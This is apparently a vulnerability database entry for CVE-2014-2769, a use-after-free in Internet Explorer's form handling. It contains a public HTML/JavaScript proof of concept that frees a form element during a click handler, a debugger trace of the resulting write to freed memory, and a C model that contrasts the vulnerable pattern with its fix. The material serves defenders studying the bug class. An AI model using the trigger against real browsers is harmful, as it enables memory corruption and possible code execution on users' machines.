CVE-2014-2769
Description
Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-1772, CVE-2014-1780, CVE-2014-1794, CVE-2014-1797, CVE-2014-1802, CVE-2014-2756, CVE-2014-2763, CVE-2014-2764, and CVE-2014-2771.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free / Memory Corruption (PoC) (MS14-035)
<!--
Exploit Title: MS14-035 Internet Explorer CFormElement Use-after-free and memory corruption POC (no crash! see trace)
Product: Internet Explorer
Vulnerable version: 9,10
Date: 8.07.2014
Exploit Author: Drozdova Liudmila, ITDefensor Vulnerability Research Team (http://itdefensor.ru/)
Vendor Homepage: http://www.microsoft.com/
Tested on: Windows 7 SP1 x86 IE 9,10
CVE : unknown
-->
<html>
<body>
  <form id="form1">
    <input id="input1" type="text" value="">
  </form>
  <script>
    loaded = false ;
    function func() {
      if (loaded) {
        document.body.innerHTML = "" ; // free CFormElement
      }
    }
    input1 = document.getElementById("input1") ;
    input1.onclick = func ;
    loaded = true ;
    input1.click(); // Call DoClick function
  </script>
</body>
</html>
<!--
Vulnerability details
MSHTML!CInput::DoClick
66943670 8bcf mov ecx,edi
66943672 ff751c push dword ptr [ebp+1Ch]
66943675 ff7518 push dword ptr [ebp+18h]
66943678 ff7514 push dword ptr [ebp+14h]
6694367b ff7510 push dword ptr [ebp+10h]
6694367e ff750c push dword ptr [ebp+0Ch]
66943681 ff7508 push dword ptr [ebp+8] <---- esi = CFormElement
66943684 e856e4f3ff call MSHTML!CElement::DoClick (66881adf) <--- call of func() in javascript, free esi
66943689 85db test ebx,ebx
6694368b 7408 je MSHTML!CInput::DoClick+0x74 (66943695)
6694368d 83666400 and dword ptr [esi+64h],0 ds:0023:0034cd84=00000001 ; memory corruption, write to freed memory
66943691 836668fe and dword ptr [esi+68h],0FFFFFFFEh ; memory corruption, write to freed memory
MSHTML!CInput::DoClick+0x60:
66943681 ff7508 push dword ptr [ebp+8] ss:0023:023ec994=00000000
0:005> p
eax=00000001 ebx=00000001 ecx=00317540 edx=66943621 esi=0034cd20 edi=00317540
eip=66943684 esp=023ec95c ebp=023ec98c iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
MSHTML!CInput::DoClick+0x63:
66943684 e856e4f3ff call MSHTML!CElement::DoClick (66881adf)
0:005> dds esi l1
0034cd20 6661ead8 MSHTML!CFormElement::`vftable'
0:005> !heap -x esi <-- esi contains valid pointer to CFormElement
Entry User Heap Segment Size PrevSize Unused Flags
-----------------------------------------------------------------------------
0034cd18 0034cd20 00270000 002fcee8 78 - c LFH;busy
0:005> p
eax=00000000 ebx=00000001 ecx=00000000 edx=66408ac8 esi=0034cd20 edi=00317540
eip=66943689 esp=023ec978 ebp=023ec98c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
MSHTML!CInput::DoClick+0x68:
66943689 85db test ebx,ebx
0:005> dds esi l1
0034cd20 6661005c MSHTML!CSVGPathSegCurvetoCubicAbs::`vftable'+0x12c
0:005> !heap -x esi <-- esi contains freed pointer to CFormElement
Entry User Heap Segment Size PrevSize Unused Flags
-----------------------------------------------------------------------------
0034cd18 0034cd20 00270000 002fcee8 78 - 0 LFH;free
0:005> p
eax=00000000 ebx=00000001 ecx=00000000 edx=66408ac8 esi=0034cd20 edi=00317540
eip=6694368b esp=023ec978 ebp=023ec98c iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
MSHTML!CInput::DoClick+0x6a:
6694368b 7408 je MSHTML!CInput::DoClick+0x74 (66943695) [br=0]
0:005> p
eax=00000000 ebx=00000001 ecx=00000000 edx=66408ac8 esi=0034cd20 edi=00317540
eip=6694368d esp=023ec978 ebp=023ec98c iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
MSHTML!CInput::DoClick+0x6c:
6694368d 83666400 and dword ptr [esi+64h],0 ds:0023:0034cd84=00000001
-->
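The trace above shows the general shape of this bug class: `CInput::DoClick` caches the form pointer in `esi`, calls out to script through `CElement::DoClick`, the script tears down the document (freeing the `CFormElement`), and the caller then writes to `[esi+64h]` and `[esi+68h]` on the freed block. The following C program is an added illustration, not the Exploit-DB PoC's code, MSHTML's code, or Microsoft's actual fix: it models that re-entrant-callback pattern with a reference-counted element, instruments "freed" blocks so the bad write is counted instead of executed, and contrasts the vulnerable shape with the standard hardening (hold a reference across the callback, re-check attachment before mutating). All type and function names are hypothetical.

```c
#include <stdio.h>
#include <stdlib.h>

/* Hypothetical stand-in for CFormElement: a document-owned, reference-counted object. */
typedef struct FormElement {
    int refcount;
    int live;            /* 1 while the block is allocated, 0 after the last release */
    unsigned int state;  /* stands in for the field at [esi+64h] */
    unsigned int flags;  /* stands in for the field at [esi+68h] */
} FormElement;

/* Hypothetical stand-in for CInput: back-pointer to its form plus a script handler. */
typedef struct InputElement {
    FormElement *form;
    void (*onclick)(struct InputElement *);
} InputElement;

/* Instrumented "heap": the last release marks the block dead instead of calling free(),
   and every field write through form_write_state() is checked against that mark, so the
   example can demonstrate the bug without executing a real use-after-free. */
static int g_writes_to_freed = 0;

static FormElement *form_create(void) {
    FormElement *f = calloc(1, sizeof *f);
    f->refcount = 1;            /* the document's own reference */
    f->live = 1;
    f->state = 1;               /* matches the 00000001 seen at [esi+64h] in the trace */
    f->flags = 0xFFFFFFFFu;
    return f;
}

static void form_addref(FormElement *f) { f->refcount++; }

static void form_release(FormElement *f) {
    if (--f->refcount == 0)
        f->live = 0;            /* real code would free(f) here */
}

static void form_write_state(FormElement *f, unsigned int state, unsigned int flags) {
    if (!f->live) g_writes_to_freed++;   /* would be a write into a freed LFH block */
    f->state = state;
    f->flags = flags;
}

/* document.body.innerHTML = "" in the PoC: detach the form and drop the document's reference. */
static void document_clear(InputElement *in) {
    FormElement *f = in->form;
    in->form = NULL;
    form_release(f);
}

/* Vulnerable shape: pointer cached before the callback, written unconditionally after it. */
static void do_click_unsafe(InputElement *in) {
    FormElement *form = in->form;          /* esi = CFormElement */
    in->onclick(in);                       /* CElement::DoClick -> script -> may free form */
    form_write_state(form, 0, form->flags & ~1u);   /* and [esi+64h],0 ; and [esi+68h],0FFFFFFFEh */
}

/* Hardened shape: a caller-held reference keeps the object alive across the re-entrant
   call, and the write only happens if the element is still attached to the document. */
static void do_click_safe(InputElement *in) {
    FormElement *form = in->form;
    form_addref(form);
    in->onclick(in);
    if (in->form == form)                  /* still attached: safe to update */
        form_write_state(form, 0, form->flags & ~1u);
    form_release(form);                    /* final release happens here, after the write */
}

/* Two script handlers: one benign, one that tears down the document like the PoC. */
static void handler_noop(InputElement *in) { (void)in; }
static void handler_clears_document(InputElement *in) { document_clear(in); }

/* Runs one click and returns the number of writes that hit a freed block (0 = safe). */
static int run_click(void (*do_click)(InputElement *), void (*handler)(InputElement *)) {
    InputElement in;
    in.form = form_create();
    in.onclick = handler;
    FormElement *block = in.form;          /* kept only to release the memory afterwards */
    g_writes_to_freed = 0;
    do_click(&in);
    free(block);
    return g_writes_to_freed;
}

int main(void) {
    printf("unsafe DoClick, benign handler:      %d\n", run_click(do_click_unsafe, handler_noop));
    printf("unsafe DoClick, document cleared:    %d\n", run_click(do_click_unsafe, handler_clears_document));
    printf("safe DoClick,   document cleared:    %d\n", run_click(do_click_safe, handler_clears_document));
    return 0;
}
```

The instrumentation is the point for defenders: in a real heap the unsafe path's write lands in an LFH block that is already `free` (as the second `!heap -x esi` in the trace shows), which is exactly the state a page-heap or ASan-style build would flag at that instruction. The hardening is the generic answer to any "call into script, then touch cached state" sequence: take a reference before the re-entrant call, release it after, and treat detachment during the call as a reason to skip the update.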
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| microsoft | internet_explorer | 10 | |
| microsoft | internet_explorer | 11 | |
References
- http://www.securityfocus.com/bid/67854
- http://www.securitytracker.com/id/1030370
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2014/ms14-035
CWEs
CWE-119